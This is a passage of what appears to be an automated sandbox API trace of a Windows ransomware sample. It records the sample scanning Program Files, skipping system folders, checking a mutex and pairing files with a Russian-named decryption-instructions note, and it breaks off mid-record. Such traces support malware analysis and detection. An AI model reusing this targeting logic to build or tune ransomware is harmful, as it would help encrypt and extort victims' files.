returned 7 [0104.144] FindFirstFileW (in: lpFileName="C:\\Program Files\\Oracle", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㮴V企@\x18㥼X頻\x18y")) returned 0xffffffff [0104.144] GetLastError () returned 0x2 [0104.144] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0104.144] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Archive") returned 7 [0104.144] FindFirstFileW (in: lpFileName="C:\\Program Files\\Archive", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㸼V企@\x18㤄X頻\x18\x81")) returned 0xffffffff [0104.144] GetLastError () returned 0x2 [0104.145] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 
[0104.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Backupe") returned 6 [0104.145] FindFirstFileW (in: lpFileName="C:\\Program Files\\Backup", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㮴V企@\x18㥼X頻\x18\x88")) returned 0xffffffff [0104.145] GetLastError () returned 0x2 [0104.145] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.145] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="backup㤀X ") returned 6 [0104.146] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Reserve") returned 6 [0104.146] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reserv", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㸼V企@\x18㤄X頻\x18\x8f")) returned 0xffffffff [0104.146] GetLastError () returned 0x2 [0104.146] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.146] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=6, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="reserv㥸X ") returned 6 [0104.146] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18e78c, cchWideChar=2047 | out: lpWideCharStr="Restore") returned 7 [0104.146] FindFirstFileW (in: lpFileName="C:\\Program Files\\Restore", lpFindFileData=0x18f540 | out: lpFindFileData=0x18f540*(dwFileAttributes=0x1d301bf, ftCreationTime.dwLowDateTime=0x6d3a4910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x330076, nFileSizeLow=0x35002e, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="㷴V䱠@㮴V企@\x18㥼X頻\x18\x97")) returned 0xffffffff [0104.147] GetLastError () returned 0x2 [0104.147] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.147] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=7, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0104.147] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.147] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.147] GlobalUnlock (hMem=0x45000c) returned 0 [0104.147] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.147] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.147] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.147] GlobalUnlock (hMem=0x45000c) returned 0 [0104.147] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.147] GlobalUnlock (hMem=0x450004) returned 0 [0104.148] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.148] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18f33c, nSize=0x400 | out: 
lpBuffer="C:\\ProgramData") returned 0xe [0104.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=15, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0104.148] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.148] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0104.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\e") returned 46 [0104.148] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.148] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0104.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa28, cbMultiByte=15, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\e") returned 15 [0104.149] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.149] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18f33c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=11, lpWideCharStr=0x18e73c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\e") returned 11 [0104.149] GlobalLock (hMem=0x450004) returned 0x588000 [0104.149] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.149] GlobalUnlock (hMem=0x450004) returned 0 [0104.149] GlobalLock (hMem=0x450004) returned 0x588000 
[0104.149] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.149] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.149] GlobalUnlock (hMem=0x450004) returned 0 [0104.149] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.149] GlobalUnlock (hMem=0x45000c) returned 0 [0104.149] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa28, cbMultiByte=15, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\e") returned 15 [0104.150] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=11, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\e") returned 11 [0104.150] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9ba0, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\e") returned 9 [0104.150] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.150] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa28, cbMultiByte=18, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\e") returned 18 [0104.151] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.151] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18e744, cchWideChar=2047 | out: 
lpWideCharStr=":\\system volume information\\pdata\\roaming\\e") returned 28 [0104.200] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=10, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\e") returned 10 [0104.200] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.200] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=8, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\e") returned 8 [0104.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.201] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=9, lpWideCharStr=0x18e744, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\e") returned 9 [0104.201] CharLowerBuffW (in: lpsz="C:\\Program Files\\", cchLength=0x11 | out: lpsz="c:\\program files\\") returned 0x11 [0104.201] SHGetMalloc (in: ppMalloc=0x18f78c | out: ppMalloc=0x18f78c*=0x767666bc) returned 0x0 [0104.201] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f788 | out: ppidl=0x18f788) returned 0x0 [0104.201] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.202] SysReAllocStringLen (in: pbstr=0x18f810*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f810*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.202] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.203] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.203] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", 
cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.203] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.203] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.203] GlobalUnlock (hMem=0x45000c) returned 0 [0104.203] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.203] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.203] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.203] GlobalUnlock (hMem=0x45000c) returned 0 [0104.203] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.203] GlobalUnlock (hMem=0x450004) returned 0 [0104.203] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x577e78 [0104.203] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe61d3d20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe61d3d20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.204] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdddb7820, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdddb7820, ftLastWriteTime.dwHighDateTime=0x1d5e82a, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0104.204] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0104.204] FileTimeToLocalFileTime (in: lpFileTime=0x18f878, lpLocalFileTime=0x18f788 | out: lpLocalFileTime=0x18f788) returned 1 [0104.204] FileTimeToDosDateTime (in: lpFileTime=0x18f788, lpFatDate=0x18f846, lpFatTime=0x18f844 | out: lpFatDate=0x18f846, lpFatTime=0x18f844) returned 1 [0104.204] GlobalLock (hMem=0x450004) returned 0x588000 [0104.204] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.204] GlobalUnlock (hMem=0x450004) returned 0 [0104.204] GlobalLock (hMem=0x450004) returned 0x588000 [0104.204] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.204] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.204] GlobalUnlock (hMem=0x450004) returned 0 [0104.204] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.204] GlobalUnlock (hMem=0x45000c) returned 0 [0104.204] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.205] CharLowerBuffW (in: lpsz="desktop.ini", cchLength=0xb | out: lpsz="desktop.ini") returned 0xb [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e71c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d÷\x18", lpUsedDefaultChar=0x0) returned 1 [0104.205] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e724, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\desktop.ini", cchWideChar=28, lpMultiByteStr=0x18e700, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\desktop.ini#M@", lpUsedDefaultChar=0x0) returned 28 [0104.205] CharLowerBuffW (in: lpsz=".ini", cchLength=0x4 | out: lpsz=".ini") returned 0x4 [0104.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".ini", cchWideChar=4, lpMultiByteStr=0x18e724, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".iniñ", lpUsedDefaultChar=0x0) returned 4 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xddec21c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddec21c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, 
ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdde29c40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde29c40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x512f1610, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0104.206] FindNextFileW (in: 
hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xddee8320, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddee8320, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xddf0e480, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddf0e480, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdde29c40, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde29c40, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdde03ae0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdde03ae0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0104.206] FindNextFileW (in: hFindFile=0x577e78, lpFindFileData=0x18f864 | out: lpFindFileData=0x18f864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdf61d9a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdf61d9a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, 